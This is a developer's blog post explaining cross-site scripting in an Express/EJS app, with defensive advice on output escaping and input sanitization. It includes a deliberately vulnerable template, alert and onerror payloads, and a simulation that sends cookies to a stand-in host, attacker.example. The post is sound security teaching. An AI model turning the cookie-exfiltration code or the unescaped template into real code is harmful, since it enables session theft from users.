XSS aka HTML Injection Attack explained

Originally published at jamischarles.com.

I’ve been doing web dev for about 10 years now, and I’ve always found the term XSS to be very fuzzy. I knew it was a term related to JavaScript and security in the browser, and that it’s usually demonstrated via alert(), usually passed in via URL params.

Recently at work I needed to patch an app for an XSS vulnerability. I was doing research on XSS and came across this great thought (unfortunately I lost the link):

I wish we could rename XSS to HTML Injection Attack.

This is a much clearer name and immediately clarifies what the danger with XSS is: the attacker sneaks some malicious JavaScript (usually via a <script> tag) into your HTML, which is then executed.

How does this HTML Injection Attack work in practice?

Let’s say we have a Node.js web app. We’re running Express and using EJS as our templating language.

We’re fetching the name url param and injecting it into the ejs template.

Route handler for the `/` route
EJS template file
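Here is a minimal sketch of what such a handler and template could look like. To keep it runnable without installing anything, a plain function stands in for the EJS template, and the handler only follows the Express `(req, res)` shape. The names `renderGreeting` and `homeHandler` and the `'stranger'` fallback are my own assumptions, not the original code.

```javascript
// Stand-in for an EJS template along the lines of: <h1>Hello <%- name %></h1>
// (<%- %> outputs the value unescaped, which is what makes this vulnerable.)
function renderGreeting(name) {
  return `<h1>Hello ${name}</h1>`;
}

// Express-style route handler for `/`: reads ?name=... and injects it into the page.
function homeHandler(req, res) {
  const name = req.query.name || 'stranger'; // fallback value is an assumption
  res.send(renderGreeting(name));
}

// With Express installed, this would be registered as: app.get('/', homeHandler);

// Quick check with a fake request/response pair.
homeHandler({ query: { name: 'Jamis' } }, { send: (body) => console.log(body) });
// <h1>Hello Jamis</h1>
```

The important detail is that whatever arrives in `name` ends up in the HTML exactly as it was sent.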

With the following result:

The Attack

So far so good. Nothing fishy going on here. Now let’s try to insert a <script> tag into the url:
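As a rough sketch, this is how such a URL could be put together and what the server gets back out of it. The `localhost:3000` address and the exact payload are assumptions for illustration.

```javascript
// The value an attacker would put in the `name` param.
const payload = '<script>alert("xss")</script>';

// Build the link; localhost:3000 is an assumed dev address.
const attackUrl = new URL('http://localhost:3000/');
attackUrl.searchParams.set('name', payload);
console.log(attackUrl.href); // the percent-encoded link that gets shared

// On the server, the param is decoded back to the original markup before use.
const received = new URL(attackUrl.href).searchParams.get('name');
console.log(received === payload); // true
```

The percent-encoding in the link is only transport encoding. By the time the value reaches the template it is a real <script> tag again.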

XSS attack shown in Firefox.

The attack worked. This is bad because we are allowing an untrusted user to execute any JavaScript they want on our page. Interestingly enough, it did not work in Chrome:

Chrome being proactive to protect against XSS

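It looks like Chrome detected that this is likely an XSS attack and blocked it. Great! Don’t rely on it, though: this built-in filter (the XSS Auditor) was later removed from Chrome, and as Firefox shows, not every browser has one.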

How can this attack hurt me?

An alert box on a page is pretty harmless. So how could this actually hurt somebody?

Here’s how an attacker could use this to get access to your bank account.

  1. You’d receive an email with instructions to log into your bank.
  2. After login, you’re instructed to click on this link https://yourBankWebsite.com/account?id=<script>[maliciousCodeHere]</script>

When you log in, your bank’s web server starts a session for you (usually lasting 10–15 minutes, after which you are automatically logged out). The session information (usually called a token) is stored in a cookie on your computer.

If the hacker can get you to log in, and then click the link he sent you, then maliciousCodeHere will run, and could send your session token to the hacker.

This allows him to steal your session. He could then (in theory) create a cookie on his computer and store your session information in it. If that session is still active, he can visit your bank’s website, and he’ll be logged in as you, and can browse around, look at bank account information, and possibly even initiate a transfer or change your password.
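To make the "send your session token to the hacker" step concrete, here is a small simulation that runs in Node. The `fakeDocument` object stands in for the browser’s `document`, and `attacker.example`, the cookie names and the `c` parameter are all made up for illustration.

```javascript
// Simulated browser state: in a real page this would be the global `document`.
const fakeDocument = { cookie: 'sessionToken=abc123; theme=dark' };

// What injected code could do: read every cookie visible to JavaScript and
// attach it to a request for a server the attacker controls.
function buildExfiltrationUrl(doc) {
  const url = new URL('https://attacker.example/collect'); // hypothetical endpoint
  url.searchParams.set('c', doc.cookie);
  return url.href;
}

// What the attacker's server would read from the incoming request.
const leaked = new URL(buildExfiltrationUrl(fakeDocument));
console.log(leaked.searchParams.get('c'));
// sessionToken=abc123; theme=dark
```

Nothing here needs special privileges. Any script running on the page can read the cookies that JavaScript is allowed to see.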

In summary, the hacker sent you a link, which caused you to run JavaScript in your browser, after you logged in, allowing him to steal protected information (in this case, the session token). This is dangerous because you are running unsafe JS after you’ve been given access to your sensitive info.

How to protect against an HTML Injection Attack

The general rule is this:

Treat any user input as unsafe.

This means that we need to sanitize any user-provided values. There are a number of libraries that do that for you, so I won’t call any out specifically.

There are several places you could sanitize. In general you should sanitize on the server, because any client-side sanitization could be circumvented by an attacker.

Sanitizing at the templating layer

The most common place to sanitize is at the templating layer, and most templating languages have built-in support for this. In EJS, you should use <%= name %> by default because it sanitizes by encoding HTML special characters, so any <script> tag shows up as &lt;script&gt; in the HTML source and as the literal text <script> on the webpage. This means it’ll be displayed as text and not executed. You are safe. In my attack example above I used <%- name %> instead of <%= name %>. <%- in EJS renders raw HTML that isn’t sanitized, and should thus be avoided with user input.
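To see the difference side by side, here is a small sketch. The `escapeHtml` function is my own hand-rolled stand-in that approximates the encoding an escaping tag like <%= %> applies. It is not EJS’s actual implementation.

```javascript
// Hand-rolled stand-in for the encoding an escaping template tag applies.
function escapeHtml(value) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => entities[ch]);
}

const name = '<script>alert(1)</script>';

// Raw output (the <%- name %> case): the browser sees a real script tag.
console.log(`<h1>Hello ${name}</h1>`);
// <h1>Hello <script>alert(1)</script></h1>

// Escaped output (the <%= name %> case): the browser sees plain text.
console.log(`<h1>Hello ${escapeHtml(name)}</h1>`);
// <h1>Hello &lt;script&gt;alert(1)&lt;/script&gt;</h1>
```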

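If you have your own templating solution or use ES6 template strings, you should sanitize your user values via some XSS library. At the very least you could strip out common XSS attack strings like <script> from the input, though stripping alone is easy to bypass (an <img onerror=...> attribute, for example, needs no <script> tag at all), so encoding the output is the safer default.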
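For ES6 template strings, one possible approach is a tagged template that escapes every interpolated value. This is only a sketch: the `html` tag and `escapeHtml` helper are hypothetical names of mine, and a well-tested library is the better choice for real apps.

```javascript
function escapeHtml(value) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Tagged template: the literal parts written by the developer pass through
// untouched, while every interpolated ${value} is escaped.
function html(strings, ...values) {
  return strings.reduce(
    (out, part, i) => out + part + (i < values.length ? escapeHtml(values[i]) : ''),
    ''
  );
}

const userName = '<img src=x onerror=alert(1)>';
console.log(html`<p>Hello ${userName}</p>`);
// <p>Hello &lt;img src=x onerror=alert(1)&gt;</p>
```

This kind of escaping covers values placed in element content or inside quoted attributes. Values dropped into a <script> block or a URL need different handling.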

Sanitizing at the storage layer

If you are saving any values to a database (like URL names, or user names, or emails) that will be displayed to the user, this is a prime location for an HTML injection attack. If I can store <script>[maliciousCode]</script> as my display name for a social site, then anybody else who sees my name could potentially run my code in their browser and I can steal their credentials. Sanitizing before you save any values from user input is a must.
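Here is one way that could look for a display name. I’m using an allowlist (keep only known-safe characters) rather than escaping, and a `Map` as a stand-in for the database. The function names and the exact set of allowed characters are assumptions you would adjust for your own app.

```javascript
// In-memory stand-in for a real database table.
const users = new Map();

// Keep letters, digits, spaces, dots, underscores and hyphens; drop everything else.
function sanitizeDisplayName(input) {
  return String(input).replace(/[^\p{L}\p{N} ._-]/gu, '').trim();
}

// Clean the value first, then store only the cleaned version.
function saveDisplayName(userId, rawName) {
  const clean = sanitizeDisplayName(rawName);
  users.set(userId, clean);
  return clean;
}

console.log(saveDisplayName(1, 'Jamis Charles'));             // Jamis Charles
console.log(saveDisplayName(2, '<script>alert(1)</script>')); // scriptalert1script
```

Even with this in place I would still escape at the templating layer, since stored values can reach the database through other paths.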

Sanitizing at the url param layer

This is my least favorite option, but you could add some middleware that sanitizes all the route parameters like so:

Example showing middleware to sanitize route params
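A minimal sketch of such a middleware, following the Express `(req, res, next)` signature. Instead of overwriting `req.query` and `req.params`, it stores escaped copies on `req.sanitized`, which is a property name I made up. `escapeHtml` and `escapeValues` are likewise hypothetical helpers.

```javascript
function escapeHtml(value) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Escape every value in a flat object such as req.query or req.params.
// Arrays (repeated params) are escaped item by item; anything else is stringified first.
function escapeValues(obj) {
  const out = {};
  for (const [key, value] of Object.entries(obj || {})) {
    out[key] = Array.isArray(value) ? value.map(escapeHtml) : escapeHtml(value);
  }
  return out;
}

// Express-style middleware: attaches escaped copies, then hands off to the next handler.
function sanitizeParams(req, res, next) {
  req.sanitized = {
    query: escapeValues(req.query),
    params: escapeValues(req.params),
  };
  next();
}

// With Express installed, this would be registered as: app.use(sanitizeParams);
```

Route handlers would then read `req.sanitized.query.name` instead of `req.query.name`. The downside, and the reason this is my least favorite option, is that every handler has to remember to use the sanitized copy.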

In Summary

In summary, HTML Injection Attacks (XSS) are usually about injecting unsafe JS into the HTML (often via the URL) in order to get a victim to run that malicious JS in their browser to steal info they have access to because they’ve logged in.

Treat all user input as unsafe, and sanitize it.